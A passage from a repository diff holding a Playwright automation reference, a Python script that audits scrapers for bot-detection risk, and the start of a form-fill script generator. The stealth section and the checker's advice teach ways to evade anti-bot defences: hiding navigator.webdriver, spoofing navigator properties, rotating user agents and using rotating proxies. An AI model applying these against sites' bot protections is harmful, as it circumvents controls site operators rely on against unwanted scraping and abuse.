    """Write items as a pretty-printed JSON array, UTF-8 encoded.

    encoding is pinned because ensure_ascii=False emits raw non-ASCII text,
    which would fail on non-UTF-8 default locales.
    """
    with open(file_path, "w", encoding="utf-8") as f:
        json.dump(items, f, indent=indent, ensure_ascii=False)
```

View File

@@ -0,0 +1,492 @@
# Playwright Browser API Reference (Automation Focus)
This reference covers Playwright's Python async API for browser automation tasks — NOT testing. For test-specific APIs (assertions, fixtures, test runners), see playwright-pro.
## Browser Launch & Context
### Launching the Browser
```python
from playwright.async_api import async_playwright
async with async_playwright() as p:
# Chromium (recommended for most automation)
browser = await p.chromium.launch(headless=True)
# Firefox (better for some anti-detection scenarios)
browser = await p.firefox.launch(headless=True)
# WebKit (Safari engine — useful for Apple-specific sites)
browser = await p.webkit.launch(headless=True)
```
**Launch options:**
| Option | Type | Default | Purpose |
|--------|------|---------|---------|
| `headless` | bool | True | Run without visible window |
| `slow_mo` | int | 0 | Milliseconds to slow each operation (debugging) |
| `proxy` | dict | None | Proxy server configuration |
| `args` | list | [] | Additional Chromium flags |
| `downloads_path` | str | None | Directory for downloads |
| `channel` | str | None | Browser channel: "chrome", "msedge" |
### Browser Contexts (Session Isolation)
Browser contexts are isolated environments within a single browser instance. Each context has its own cookies, localStorage, and cache. Use them instead of launching multiple browsers.
```python
# Create isolated context
context = await browser.new_context(
viewport={"width": 1920, "height": 1080},
user_agent="Mozilla/5.0 ...",
locale="en-US",
timezone_id="America/New_York",
geolocation={"latitude": 40.7128, "longitude": -74.0060},
permissions=["geolocation"],
)
# Multiple contexts share one browser (resource efficient)
context_a = await browser.new_context() # User A session
context_b = await browser.new_context() # User B session
```
### Storage State (Session Persistence)
```python
# Save state after login (cookies + localStorage)
await context.storage_state(path="auth_state.json")
# Restore state in new context
context = await browser.new_context(storage_state="auth_state.json")
```
## Page Navigation
### Basic Navigation
```python
page = await context.new_page()
# Navigate with different wait strategies
await page.goto("https://example.com") # Default: "load"
await page.goto("https://example.com", wait_until="domcontentloaded") # Faster
await page.goto("https://example.com", wait_until="networkidle") # Wait for network quiet
await page.goto("https://example.com", timeout=30000) # Custom timeout (ms)
```
**`wait_until` options:**
- `"load"` — wait for the `load` event (all resources loaded)
- `"domcontentloaded"` — DOM is ready, images/styles may still load
- `"networkidle"` — no network requests for 500ms (best for SPAs)
- `"commit"` — response received, before any rendering
### Wait Strategies
```python
# Wait for a specific element to appear
await page.wait_for_selector("div.content", state="visible")
await page.wait_for_selector("div.loading", state="hidden") # Wait for loading to finish
await page.wait_for_selector("table tbody tr", state="attached") # In DOM but maybe not visible
# Wait for URL change
await page.wait_for_url("**/dashboard**")
await page.wait_for_url(re.compile(r"/dashboard/\d+"))
# Wait for specific network response
async with page.expect_response("**/api/data*") as resp_info:
await page.click("button.load")
response = await resp_info.value
json_data = await response.json()
# Wait for page load state
await page.wait_for_load_state("networkidle")
# Fixed wait (use sparingly — prefer the methods above)
await page.wait_for_timeout(1000) # milliseconds
```
### Navigation History
```python
await page.go_back()
await page.go_forward()
await page.reload()
```
## Element Interaction
### Finding Elements
```python
# Single element (returns first match)
element = await page.query_selector("css=div.product")
element = await page.query_selector("xpath=//div[@class='product']")
# Multiple elements
elements = await page.query_selector_all("div.product")
# Locator API (recommended — auto-waits, re-queries on each action)
locator = page.locator("div.product")
count = await locator.count()
first = locator.first
nth = locator.nth(2)
```
**Locator vs query_selector:**
- `query_selector` — returns an ElementHandle at a point in time. Can go stale if DOM changes.
- `locator` — returns a Locator that re-queries each time you interact with it. Preferred for reliability.
### Clicking
```python
await page.click("button.submit")
await page.click("a:has-text('Next')")
await page.dblclick("div.editable")
await page.click("button", position={"x": 10, "y": 10}) # Click at offset
await page.click("button", force=True) # Skip actionability checks
await page.click("button", modifiers=["Shift"]) # With modifier key
```
### Text Input
```python
# Fill (clears existing content first)
await page.fill("input#email", "user@example.com")
# Type (simulates keystroke-by-keystroke input — slower, more realistic)
await page.type("input#search", "query text", delay=50) # 50ms between keys
# Press specific keys
await page.press("input#search", "Enter")
await page.press("body", "Control+a")
```
### Dropdowns & Select
```python
# Native <select> element
await page.select_option("select#country", value="US")
await page.select_option("select#country", label="United States")
await page.select_option("select#tags", value=["tag1", "tag2"]) # Multi-select
# Custom dropdown (non-native)
await page.click("div.dropdown-trigger")
await page.click("li.option:has-text('United States')")
```
### Checkboxes & Radio Buttons
```python
await page.check("input#agree")
await page.uncheck("input#newsletter")
is_checked = await page.is_checked("input#agree")
```
### File Upload
```python
# Standard file input
await page.set_input_files("input[type='file']", "/path/to/file.pdf")
await page.set_input_files("input[type='file']", ["/path/a.pdf", "/path/b.pdf"])
# Clear file selection
await page.set_input_files("input[type='file']", [])
# Non-standard upload (drag-and-drop zones)
async with page.expect_file_chooser() as fc_info:
await page.click("div.upload-zone")
file_chooser = await fc_info.value
await file_chooser.set_files("/path/to/file.pdf")
```
### Hover & Focus
```python
await page.hover("div.menu-item")
await page.focus("input#search")
```
## Data Extraction
### Text Content
```python
# Get text content of an element
text = await page.text_content("h1.title")
inner_text = await page.inner_text("div.description") # Visible text only
inner_html = await page.inner_html("div.content") # HTML markup
# Get attribute
href = await page.get_attribute("a.link", "href")
src = await page.get_attribute("img.photo", "src")
```
### JavaScript Evaluation
```python
# Evaluate in page context
title = await page.evaluate("document.title")
scroll_height = await page.evaluate("document.body.scrollHeight")
# Evaluate on a specific element
text = await page.eval_on_selector("h1", "el => el.textContent")
texts = await page.eval_on_selector_all("li", "els => els.map(e => e.textContent.trim())")
# Complex extraction
data = await page.evaluate("""
() => {
const rows = document.querySelectorAll('table tbody tr');
return Array.from(rows).map(row => {
const cells = row.querySelectorAll('td');
return {
name: cells[0]?.textContent.trim(),
value: cells[1]?.textContent.trim(),
};
});
}
""")
```
### Screenshots & PDF
```python
# Full page screenshot
await page.screenshot(path="page.png", full_page=True)
# Viewport screenshot
await page.screenshot(path="viewport.png")
# Element screenshot
await page.locator("div.chart").screenshot(path="chart.png")
# PDF (Chromium only)
await page.pdf(path="page.pdf", format="A4", print_background=True)
# Screenshot as bytes (for processing without saving)
buffer = await page.screenshot()
```
## Network Interception
### Monitoring Requests
```python
# Listen for all responses
page.on("response", lambda response: print(f"{response.status} {response.url}"))
# Wait for a specific API call
async with page.expect_response("**/api/products*") as resp:
await page.click("button.load")
response = await resp.value
data = await response.json()
```
### Blocking Resources (Speed Up Scraping)
```python
# Block images, fonts, and CSS to speed up scraping
await page.route("**/*.{png,jpg,jpeg,gif,svg,woff,woff2,ttf}", lambda route: route.abort())
await page.route("**/*.css", lambda route: route.abort())
# Block specific domains (ads, analytics)
await page.route("**/google-analytics.com/**", lambda route: route.abort())
await page.route("**/facebook.com/**", lambda route: route.abort())
```
### Modifying Requests
```python
# Add custom headers
await page.route("**/*", lambda route: route.continue_(headers={
**route.request.headers,
"X-Custom-Header": "value"
}))
# Mock API responses
await page.route("**/api/data", lambda route: route.fulfill(
status=200,
content_type="application/json",
body=json.dumps({"items": []}),
))
```
## Dialog Handling
```python
# Auto-accept all dialogs
page.on("dialog", lambda dialog: dialog.accept())
# Handle specific dialog types
async def handle_dialog(dialog):
if dialog.type == "confirm":
await dialog.accept()
elif dialog.type == "prompt":
await dialog.accept("my input")
elif dialog.type == "alert":
await dialog.dismiss()
page.on("dialog", handle_dialog)
```
## File Downloads
```python
# Wait for download to start
async with page.expect_download() as dl_info:
await page.click("a.download-link")
download = await dl_info.value
# Save to specific path
await download.save_as("/path/to/downloads/" + download.suggested_filename)
# Get download as bytes
path = await download.path() # Temp file path
# Set download behavior at context level
context = await browser.new_context(accept_downloads=True)
```
## Frames & Iframes
```python
# Access iframe by selector
frame = page.frame_locator("iframe#content")
await frame.locator("button.submit").click()
# Access frame by name
frame = page.frame(name="editor")
# Access all frames
for frame in page.frames:
print(frame.url)
```
## Cookie Management
```python
# Get all cookies
cookies = await context.cookies()
# Get cookies for specific URL
cookies = await context.cookies(["https://example.com"])
# Add cookies
await context.add_cookies([{
"name": "session",
"value": "abc123",
"domain": "example.com",
"path": "/",
"httpOnly": True,
"secure": True,
}])
# Clear cookies
await context.clear_cookies()
```
## Concurrency Patterns
### Multiple Pages in One Context
```python
# Open multiple tabs in the same session
pages = []
for url in urls:
page = await context.new_page()
await page.goto(url)
pages.append(page)
# Process all pages
for page in pages:
data = await extract_data(page)
await page.close()
```
### Multiple Contexts for Parallel Sessions
```python
import asyncio
async def scrape_with_context(browser, url):
context = await browser.new_context(user_agent=random.choice(USER_AGENTS))
page = await context.new_page()
await page.goto(url)
data = await extract_data(page)
await context.close()
return data
# Run 5 concurrent scraping tasks
tasks = [scrape_with_context(browser, url) for url in urls[:5]]
results = await asyncio.gather(*tasks)
```
## Init Scripts (Stealth)
Init scripts run before any page script, in every new page/context.
```python
# Remove webdriver flag
await context.add_init_script("""
Object.defineProperty(navigator, 'webdriver', {get: () => undefined});
""")
# Override plugins (headless Chrome has empty plugins)
await context.add_init_script("""
Object.defineProperty(navigator, 'plugins', {
get: () => [1, 2, 3, 4, 5],
});
""")
# Override languages
await context.add_init_script("""
Object.defineProperty(navigator, 'languages', {
get: () => ['en-US', 'en'],
});
""")
# From file
await context.add_init_script(path="stealth.js")
```
## Common Automation Patterns
### Scrolling
```python
# Scroll to bottom
await page.evaluate("window.scrollTo(0, document.body.scrollHeight)")
# Scroll element into view
await page.locator("div.target").scroll_into_view_if_needed()
# Smooth scroll simulation
await page.evaluate("""
async () => {
const delay = ms => new Promise(r => setTimeout(r, ms));
for (let i = 0; i < document.body.scrollHeight; i += 300) {
window.scrollTo(0, i);
await delay(100);
}
}
""")
```
### Clipboard Operations
```python
# Copy text
await page.evaluate("navigator.clipboard.writeText('hello')")
# Paste via keyboard
await page.keyboard.press("Control+v")
```
### Shadow DOM
```python
# Playwright's CSS selectors pierce open shadow DOM automatically; >> chains selectors
await page.locator("my-component >> .inner-button").click()
# Equivalent with explicit css= engines chained via >>
await page.locator("css=host-element >> css=.shadow-child").click()
```

View File

@@ -0,0 +1,520 @@
#!/usr/bin/env python3
"""
Anti-Detection Checker - Audits Playwright scripts for common bot detection vectors.
Analyzes a Playwright automation script and identifies patterns that make the
browser detectable as a bot. Produces a risk score (0-100) with specific
recommendations for each issue found.
Detection vectors checked:
- Headless mode usage
- Default/missing user agent configuration
- Viewport size (default 800x600 is a red flag)
- WebDriver flag (navigator.webdriver)
- Navigator property overrides
- Request throttling / human-like delays
- Cookie/session management
- Proxy configuration
- Error handling patterns
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict
from typing import List, Optional
@dataclass
class Finding:
    """A single detection risk finding produced by AntiDetectionChecker.

    Each finding names a detection vector, how serious it is, where it was
    seen, and what to change; ``weight`` feeds the overall risk score.
    """
    category: str  # detection vector name, e.g. "User Agent", "Viewport Size"
    severity: str  # "critical", "high", "medium", "low", "info"
    description: str  # human-readable explanation of the risk
    line: Optional[int]  # 1-based line in the analyzed script, or None when file-wide
    recommendation: str  # concrete remediation advice
    weight: int  # Points added to risk score (0-15)
# Risk-score points contributed by a finding of each severity.
# "info" findings are informational only and add nothing to the score.
SEVERITY_WEIGHTS = {
    "critical": 15,
    "high": 10,
    "medium": 5,
    "low": 2,
    "info": 0,
}
class AntiDetectionChecker:
"""Analyzes Playwright scripts for bot detection vulnerabilities."""
    def __init__(self, script_content: str, file_path: str = "<stdin>"):
        """Prepare the checker for one script.

        Args:
            script_content: Full text of the Playwright script to audit.
            file_path: Display name for reporting; defaults to "<stdin>".
        """
        self.content = script_content
        # Pre-split lines so regex hits can be mapped to 1-based line numbers.
        self.lines = script_content.split("\n")
        self.file_path = file_path
        self.findings: List[Finding] = []
def check_all(self) -> List[Finding]:
"""Run all detection checks."""
self._check_headless_mode()
self._check_user_agent()
self._check_viewport()
self._check_webdriver_flag()
self._check_navigator_properties()
self._check_request_delays()
self._check_error_handling()
self._check_proxy()
self._check_session_management()
self._check_browser_close()
self._check_stealth_imports()
return self.findings
def _find_line(self, pattern: str) -> Optional[int]:
"""Find the first line number matching a regex pattern."""
for i, line in enumerate(self.lines, 1):
if re.search(pattern, line):
return i
return None
def _has_pattern(self, pattern: str) -> bool:
"""Check if pattern exists anywhere in the script."""
return bool(re.search(pattern, self.content))
    def _check_headless_mode(self):
        """Check if headless mode is properly configured.

        Emits a "high" finding for an explicit headless=False, an "info"
        finding when the option never appears (Playwright defaults to True),
        and nothing at all for an explicit headless=True.
        """
        if self._has_pattern(r"headless\s*=\s*False"):
            self.findings.append(Finding(
                category="Headless Mode",
                severity="high",
                description="Browser launched in headed mode (headless=False). This is fine for development but should be headless=True in production.",
                line=self._find_line(r"headless\s*=\s*False"),
                recommendation="Use headless=True for production. Toggle via environment variable: headless=os.environ.get('HEADLESS', 'true') == 'true'",
                weight=SEVERITY_WEIGHTS["high"],
            ))
        elif not self._has_pattern(r"headless"):
            # Default is headless=True in Playwright, which is correct
            self.findings.append(Finding(
                category="Headless Mode",
                severity="info",
                description="Using default headless mode (True). Good for production.",
                line=None,
                recommendation="No action needed. Default headless=True is correct.",
                weight=SEVERITY_WEIGHTS["info"],
            ))
    def _check_user_agent(self):
        """Check if a custom user agent is set.

        Three outcomes: "critical" when no user agent is configured at all,
        "info" when both a UA list and random selection are present
        (rotation), and "low" when a single static UA is set.
        """
        has_ua = self._has_pattern(r"user_agent\s*=") or self._has_pattern(r"userAgent")
        has_ua_list = self._has_pattern(r"USER_AGENTS?\s*=\s*\[")
        has_random_ua = self._has_pattern(r"random\.choice.*(?:USER_AGENT|user_agent|ua)")
        if not has_ua:
            self.findings.append(Finding(
                category="User Agent",
                severity="critical",
                description="No custom user agent configured. Playwright's default user agent contains 'HeadlessChrome' which is trivially detected.",
                line=None,
                recommendation="Set a realistic user agent: context = await browser.new_context(user_agent='Mozilla/5.0 ...')",
                weight=SEVERITY_WEIGHTS["critical"],
            ))
        elif has_ua_list and has_random_ua:
            self.findings.append(Finding(
                category="User Agent",
                severity="info",
                description="User agent rotation detected. Good anti-detection practice.",
                line=self._find_line(r"USER_AGENTS?\s*=\s*\["),
                recommendation="Ensure user agents are recent and match the browser being launched (e.g., Chrome UA for Chromium).",
                weight=SEVERITY_WEIGHTS["info"],
            ))
        elif has_ua:
            # NOTE: has_ua is always True on this branch (the first branch
            # handled `not has_ua`); kept as an explicit guard for readability.
            self.findings.append(Finding(
                category="User Agent",
                severity="low",
                description="Custom user agent set but no rotation detected. Single user agent is fingerprint-able at scale.",
                line=self._find_line(r"user_agent\s*="),
                recommendation="Rotate through 5-10 recent user agents using random.choice().",
                weight=SEVERITY_WEIGHTS["low"],
            ))
    def _check_viewport(self):
        """Check viewport configuration.

        Flags a missing viewport ("high"), a configured width under 1024px
        ("medium"), or records an "info" finding for a reasonable width.
        """
        has_viewport = self._has_pattern(r"viewport\s*=\s*\{") or self._has_pattern(r"viewport.*width")
        if not has_viewport:
            self.findings.append(Finding(
                category="Viewport Size",
                severity="high",
                description="No viewport configured. Default Playwright viewport (1280x720) is common among bots. Sites may flag unusual viewport distributions.",
                line=None,
                recommendation="Set a common desktop viewport: viewport={'width': 1920, 'height': 1080}. Vary across runs.",
                weight=SEVERITY_WEIGHTS["high"],
            ))
        else:
            # Check for suspiciously small viewports
            # NOTE(review): this regex matches the first `width` assignment
            # anywhere in the script, which is presumably but not necessarily
            # the viewport width — confirm if false positives show up.
            match = re.search(r"width['\"]?\s*[:=]\s*(\d+)", self.content)
            if match:
                width = int(match.group(1))
                if width < 1024:
                    self.findings.append(Finding(
                        category="Viewport Size",
                        severity="medium",
                        description=f"Viewport width {width}px is unusually small. Most desktop browsers are 1366px+ wide.",
                        line=self._find_line(r"width.*" + str(width)),
                        recommendation="Use 1366x768 (most common) or 1920x1080. Avoid unusual sizes like 800x600.",
                        weight=SEVERITY_WEIGHTS["medium"],
                    ))
                else:
                    self.findings.append(Finding(
                        category="Viewport Size",
                        severity="info",
                        description=f"Viewport width {width}px is reasonable.",
                        line=self._find_line(r"width.*" + str(width)),
                        recommendation="No action needed.",
                        weight=SEVERITY_WEIGHTS["info"],
                    ))
    def _check_webdriver_flag(self):
        """Check if navigator.webdriver is being removed.

        Any mention of webdriver overriding counts as covered ("info");
        its complete absence is "critical".
        """
        # Several phrasings of the same override are accepted.
        has_webdriver_override = (
            self._has_pattern(r"navigator.*webdriver") or
            self._has_pattern(r"webdriver.*undefined") or
            self._has_pattern(r"add_init_script.*webdriver")
        )
        if not has_webdriver_override:
            self.findings.append(Finding(
                category="WebDriver Flag",
                severity="critical",
                description="navigator.webdriver is not overridden. This is the most common bot detection check. Every major anti-bot service tests this property.",
                line=None,
                recommendation=(
                    "Add init script to remove the flag:\n"
                    "  await page.add_init_script(\"Object.defineProperty(navigator, 'webdriver', {get: () => undefined});\")"
                ),
                weight=SEVERITY_WEIGHTS["critical"],
            ))
        else:
            self.findings.append(Finding(
                category="WebDriver Flag",
                severity="info",
                description="navigator.webdriver override detected.",
                line=self._find_line(r"webdriver"),
                recommendation="No action needed.",
                weight=SEVERITY_WEIGHTS["info"],
            ))
    def _check_navigator_properties(self):
        """Check for additional navigator property hardening.

        Counts how many of plugins/languages/platform appear overridden:
        0 of 3 is "medium", 1-2 is "low", and all 3 produces no finding.
        """
        # Maps property name -> (detection regex, explanation). The
        # explanations are currently unused by the loop below; they document
        # why each property matters.
        checks = {
            "plugins": (r"navigator.*plugins", "navigator.plugins is empty in headless mode. Real browsers report installed plugins."),
            "languages": (r"navigator.*languages", "navigator.languages should be set to match the user agent locale."),
            "platform": (r"navigator.*platform", "navigator.platform should match the user agent OS."),
        }
        overridden_count = 0
        for prop, (pattern, desc) in checks.items():
            if self._has_pattern(pattern):
                overridden_count += 1
        if overridden_count == 0:
            self.findings.append(Finding(
                category="Navigator Properties",
                severity="medium",
                description="No navigator property hardening detected. Advanced anti-bot services check plugins, languages, and platform properties.",
                line=None,
                recommendation="Override navigator.plugins, navigator.languages, and navigator.platform via add_init_script() to match realistic browser fingerprints.",
                weight=SEVERITY_WEIGHTS["medium"],
            ))
        elif overridden_count < 3:
            self.findings.append(Finding(
                category="Navigator Properties",
                severity="low",
                description=f"Partial navigator hardening ({overridden_count}/3 properties). Consider covering all three: plugins, languages, platform.",
                line=None,
                recommendation="Add overrides for any missing properties among: plugins, languages, platform.",
                weight=SEVERITY_WEIGHTS["low"],
            ))
def _check_request_delays(self):
    """Look for human-like pauses between page interactions.

    Records a high-severity finding when no delays exist, a medium one when
    delays are fixed rather than randomized, and an info note otherwise.
    """
    sleeps_present = self._has_pattern(r"asyncio\.sleep") or self._has_pattern(r"wait_for_timeout")
    randomized = sleeps_present and self._has_pattern(r"random\.(uniform|randint|random)")
    if not sleeps_present:
        # Machine-speed interaction is the easiest behavioral tell.
        self.findings.append(Finding(
            category="Request Timing",
            severity="high",
            description="No delays between actions detected. Machine-speed interactions are the easiest behavior-based detection signal.",
            line=None,
            recommendation="Add random delays between page interactions: await asyncio.sleep(random.uniform(0.5, 2.0))",
            weight=SEVERITY_WEIGHTS["high"],
        ))
    elif not randomized:
        # Constant intervals are still a detectable pattern.
        self.findings.append(Finding(
            category="Request Timing",
            severity="medium",
            description="Fixed delays detected but no randomization. Constant timing intervals are detectable patterns.",
            line=self._find_line(r"(asyncio\.sleep|wait_for_timeout)"),
            recommendation="Use random delays: random.uniform(min_seconds, max_seconds) instead of fixed values.",
            weight=SEVERITY_WEIGHTS["medium"],
        ))
    else:
        self.findings.append(Finding(
            category="Request Timing",
            severity="info",
            description="Randomized delays detected between actions.",
            line=self._find_line(r"random\.(uniform|randint)"),
            recommendation="No action needed. Ensure delays are realistic (0.5-3s for browsing, 1-5s for reading).",
            weight=SEVERITY_WEIGHTS["info"],
        ))
def _check_error_handling(self):
    """Audit the script for try/except coverage and retry logic."""
    guarded = self._has_pattern(r"try\s*:") and self._has_pattern(r"except")
    has_retry_logic = self._has_pattern(r"retr(y|ies)") or self._has_pattern(r"max_retries|max_attempts")
    if not guarded:
        # No exception handling at all: crashes can leave browsers running.
        self.findings.append(Finding(
            category="Error Handling",
            severity="medium",
            description="No try/except blocks found. Unhandled errors will crash the automation and leave browser instances running.",
            line=None,
            recommendation="Wrap page interactions in try/except. Handle TimeoutError, network errors, and element-not-found gracefully.",
            weight=SEVERITY_WEIGHTS["medium"],
        ))
        return
    if not has_retry_logic:
        # Handled errors but no retries: transient failures lose data.
        self.findings.append(Finding(
            category="Error Handling",
            severity="low",
            description="Error handling present but no retry logic detected. Transient failures (network blips, slow loads) will cause data loss.",
            line=None,
            recommendation="Add retry with exponential backoff for network operations and element interactions.",
            weight=SEVERITY_WEIGHTS["low"],
        ))
def _check_proxy(self):
    """Flag scripts that run without any proxy configuration."""
    proxy_patterns = (r"proxy\s*=\s*\{", r"proxy.*server")
    if any(self._has_pattern(p) for p in proxy_patterns):
        return
    # Single-IP operation is fine for small jobs; at scale it rate-limits.
    self.findings.append(Finding(
        category="Proxy",
        severity="low",
        description="No proxy configuration detected. Running from a single IP address is fine for small jobs but will trigger rate limits at scale.",
        line=None,
        recommendation="For high-volume scraping, use rotating proxies: proxy={'server': 'http://proxy:port'}",
        weight=SEVERITY_WEIGHTS["low"],
    ))
def _check_session_management(self):
    """Check whether the script persists cookies/session state across runs."""
    persistence_patterns = (r"storage_state", r"cookies\(\)", r"add_cookies")
    if any(self._has_pattern(p) for p in persistence_patterns):
        return
    # Fresh sessions force repeated logins, which can trip security alerts.
    self.findings.append(Finding(
        category="Session Management",
        severity="low",
        description="No session persistence detected. Each run will start fresh, requiring re-authentication.",
        line=None,
        recommendation="Use storage_state() to save/restore sessions across runs. This avoids repeated logins that may trigger security alerts.",
        weight=SEVERITY_WEIGHTS["low"],
    ))
def _check_browser_close(self):
    """Verify the browser is closed explicitly or via a context manager."""
    cleanup_patterns = (
        r"browser\.close\(\)",                # explicit close call
        r"await.*close",                      # any awaited close
        r"async\s+with\s+async_playwright",   # context manager handles teardown
    )
    if any(self._has_pattern(p) for p in cleanup_patterns):
        return
    self.findings.append(Finding(
        category="Resource Cleanup",
        severity="medium",
        description="No browser.close() or context manager detected. Browser processes will leak on failure.",
        line=None,
        recommendation="Use 'async with async_playwright() as p:' or ensure browser.close() is in a finally block.",
        weight=SEVERITY_WEIGHTS["medium"],
    ))
def _check_stealth_imports(self):
    """Record an informational note when a third-party stealth library is used."""
    stealth_re = r"playwright_stealth|stealth_async|undetected"
    if not self._has_pattern(stealth_re):
        return
    self.findings.append(Finding(
        category="Stealth Library",
        severity="info",
        description="Third-party stealth library detected. These provide additional fingerprint evasion but add dependencies.",
        line=self._find_line(stealth_re),
        recommendation="Stealth libraries are helpful but not a silver bullet. Still implement manual checks for user agent, viewport, and timing.",
        weight=SEVERITY_WEIGHTS["info"],
    ))
def get_risk_score(self) -> int:
    """Calculate overall risk score (0-100). Higher = more detectable."""
    total = 0
    for finding in self.findings:
        total += finding.weight
    # Clamp to the 0-100 display range.
    return total if total < 100 else 100
def get_risk_level(self) -> str:
    """Map the numeric risk score onto a coarse human-readable label."""
    score = self.get_risk_score()
    # Ordered thresholds: first bucket the score fits in wins.
    for threshold, label in ((10, "LOW"), (30, "MODERATE"), (50, "HIGH")):
        if score <= threshold:
            return label
    return "CRITICAL"
def get_summary(self) -> dict:
    """Build a dict summary of the analysis (score, level, severity counts)."""
    counts = {sev: 0 for sev in ("critical", "high", "medium", "low", "info")}
    actionable = 0
    for finding in self.findings:
        counts[finding.severity] += 1
        # "info" findings are advisory only; everything else needs action.
        if finding.severity != "info":
            actionable += 1
    return {
        "file": self.file_path,
        "risk_score": self.get_risk_score(),
        "risk_level": self.get_risk_level(),
        "total_findings": len(self.findings),
        "severity_counts": counts,
        "actionable_findings": actionable,
    }
def format_text_report(checker: AntiDetectionChecker, verbose: bool = False) -> str:
    """Render the checker's findings as a human-readable text report.

    Args:
        checker: A checker whose check_all() has already run.
        verbose: When True, include informational findings in the listing.

    Returns:
        The full report as a single newline-joined string.
    """
    summary = checker.get_summary()
    out = []
    banner = "=" * 60
    out.append(banner)
    out.append("  ANTI-DETECTION AUDIT REPORT")
    out.append(banner)
    out.append(f"File: {summary['file']}")
    out.append(f"Risk Score: {summary['risk_score']}/100 ({summary['risk_level']})")
    out.append(f"Total Issues: {summary['actionable_findings']} actionable, {summary['severity_counts']['info']} info")
    out.append("")
    # Severity breakdown (only non-zero buckets are printed).
    for severity in ("critical", "high", "medium", "low"):
        count = summary["severity_counts"][severity]
        if count > 0:
            out.append(f"  {severity.upper():10s} {count}")
    out.append("")
    # Findings grouped by severity; info is appended only in verbose mode.
    shown = ["critical", "high", "medium", "low"] + (["info"] if verbose else [])
    for severity in shown:
        matching = [f for f in checker.findings if f.severity == severity]
        if not matching:
            continue
        out.append(f"--- {severity.upper()} ---")
        for finding in matching:
            suffix = f" (line {finding.line})" if finding.line else ""
            out.append(f"  [{finding.category}]{suffix}")
            out.append(f"    {finding.description}")
            out.append(f"    Fix: {finding.recommendation}")
        out.append("")
    # Verdict line mirrors the CLI exit-code thresholds.
    out.append("-" * 60)
    score = summary["risk_score"]
    if score <= 10:
        verdict = "Result: PASS - Low detection risk."
    elif score <= 30:
        verdict = "Result: PASS with warnings - Address medium/high issues for production use."
    else:
        verdict = "Result: FAIL - High detection risk. Fix critical and high issues before deploying."
    out.append(verdict)
    out.append("")
    return "\n".join(out)
def main():
    """CLI entry point: parse arguments, run the audit, report, and exit.

    Exit codes: 0 (score <= 10), 1 (score 11-50), 2 (score 51+ or usage error).
    """
    parser = argparse.ArgumentParser(
        description="Audit a Playwright script for common bot detection vectors.",
        epilog=(
            "Examples:\n"
            "  %(prog)s --file scraper.py\n"
            "  %(prog)s --file scraper.py --verbose\n"
            "  %(prog)s --file scraper.py --json\n"
            "\n"
            "Exit codes:\n"
            "  0 - Low risk (score 0-10)\n"
            "  1 - Moderate to high risk (score 11-50)\n"
            "  2 - Critical risk (score 51+)\n"
        ),
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument(
        "--file",
        required=True,
        help="Path to the Playwright script to audit",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_output",
        default=False,
        help="Output results as JSON",
    )
    parser.add_argument(
        "--verbose",
        action="store_true",
        default=False,
        help="Include informational (non-actionable) findings in output",
    )
    args = parser.parse_args()
    file_path = os.path.abspath(args.file)
    if not os.path.isfile(file_path):
        print(f"Error: File not found: {file_path}", file=sys.stderr)
        sys.exit(2)
    try:
        with open(file_path, "r", encoding="utf-8") as f:
            content = f.read()
    except Exception as e:
        # Broad catch is deliberate here: any read failure is fatal for the CLI.
        print(f"Error reading file: {e}", file=sys.stderr)
        sys.exit(2)
    if not content.strip():
        print("Error: File is empty.", file=sys.stderr)
        sys.exit(2)
    checker = AntiDetectionChecker(content, file_path)
    checker.check_all()
    if args.json_output:
        # JSON mode: summary plus serialized findings; info-level entries are
        # filtered out unless --verbose was given.
        output = checker.get_summary()
        output["findings"] = [asdict(f) for f in checker.findings]
        if not args.verbose:
            output["findings"] = [f for f in output["findings"] if f["severity"] != "info"]
        print(json.dumps(output, indent=2))
    else:
        print(format_text_report(checker, verbose=args.verbose))
    # Exit code based on risk
    score = checker.get_risk_score()
    if score <= 10:
        sys.exit(0)
    elif score <= 50:
        sys.exit(1)
    else:
        sys.exit(2)


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,324 @@
#!/usr/bin/env python3
"""
Form Automation Builder - Generates Playwright form-fill automation scripts.
Takes a JSON field specification and target URL, then produces a ready-to-run
Playwright script that fills forms, handles multi-step flows, and manages
file uploads.
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import os
import sys
import textwrap
from datetime import datetime
# Maps each supported field type to a template of the Playwright call used to
# drive it. Values are documentation/templates; generate_field_action() emits
# the actual code. For "checkbox" the check-vs-uncheck decision is made at
# generation time from the field's "value", so only the canonical template is
# kept here (the original `... if True else ...` ternary always produced the
# first branch and was dead code).
SUPPORTED_FIELD_TYPES = {
    "text": "page.fill('{selector}', '{value}')",
    "password": "page.fill('{selector}', '{value}')",
    "email": "page.fill('{selector}', '{value}')",
    "textarea": "page.fill('{selector}', '{value}')",
    "select": "page.select_option('{selector}', value='{value}')",
    "checkbox": "page.check('{selector}')",
    "radio": "page.check('{selector}')",
    "file": "page.set_input_files('{selector}', '{value}')",
    "click": "page.click('{selector}')",
}
def validate_fields(fields):
    """Validate the field specification format. Returns list of issues."""
    if not isinstance(fields, list):
        # Nothing else can be checked if the top-level shape is wrong.
        return ["Top-level structure must be a JSON array of field objects."]
    issues = []
    for index, spec in enumerate(fields):
        if not isinstance(spec, dict):
            issues.append(f"Field {index}: must be a JSON object.")
            continue
        if "selector" not in spec:
            issues.append(f"Field {index}: missing required 'selector' key.")
        if "type" not in spec:
            issues.append(f"Field {index}: missing required 'type' key.")
        elif spec["type"] not in SUPPORTED_FIELD_TYPES:
            supported = ", ".join(sorted(SUPPORTED_FIELD_TYPES.keys()))
            issues.append(
                f"Field {index}: unsupported type '{spec['type']}'. "
                f"Supported: {supported}"
            )
        # Interaction-only types (checkbox/radio/click) do not require a value.
        if spec.get("type") not in ("checkbox", "radio", "click") and "value" not in spec:
            issues.append(f"Field {index}: missing 'value' for type '{spec.get('type', '?')}'.")
    return issues
def _escape_dq(text):
    """Escape backslashes and double quotes so *text* can be embedded safely
    inside a double-quoted string literal in the generated script."""
    return str(text).replace("\\", "\\\\").replace('"', '\\"')


def generate_field_action(field, indent=8):
    """Generate the Playwright action line(s) for a single field.

    Args:
        field: One validated field-spec dict (selector/type/value/...).
        indent: Number of spaces to prefix each generated line with.

    Returns:
        One or more newline-joined generated source lines: a label comment,
        the action call, and optionally a wait_for_selector() follow-up.

    Fixes over the previous version:
